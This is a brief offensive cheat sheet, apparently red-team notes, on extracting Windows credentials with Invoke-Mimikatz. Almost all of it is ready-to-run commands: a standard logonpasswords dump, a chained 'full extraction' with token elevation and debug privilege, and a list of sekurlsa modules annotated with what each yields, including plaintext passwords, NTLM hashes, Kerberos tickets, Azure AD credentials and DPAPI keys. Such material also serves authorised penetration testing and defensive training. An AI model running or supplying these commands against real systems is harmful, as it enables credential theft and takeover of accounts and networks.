🔑 Credential Extraction

🎯 Primary Credential Extraction

# Standard dump
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

# Full extraction
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::credman" "sekurlsa::wdigest" "sekurlsa::kerberos" "sekurlsa::ssp" "sekurlsa::livessp" "sekurlsa::tspkg" "sekurlsa::cloudap"'

📦 SEKURLSA Providers

sekurlsa::msv       # NTLM auth
sekurlsa::wdigest   # Plaintext passwords
sekurlsa::kerberos  # Kerberos tickets
sekurlsa::tspkg     # Terminal Services
sekurlsa::livessp   # Live/Outlook creds
sekurlsa::ssp       # Security Support Provider
sekurlsa::credman   # Credential Manager
sekurlsa::cloudap   # Azure AD creds
sekurlsa::dpapi     # DPAPI keys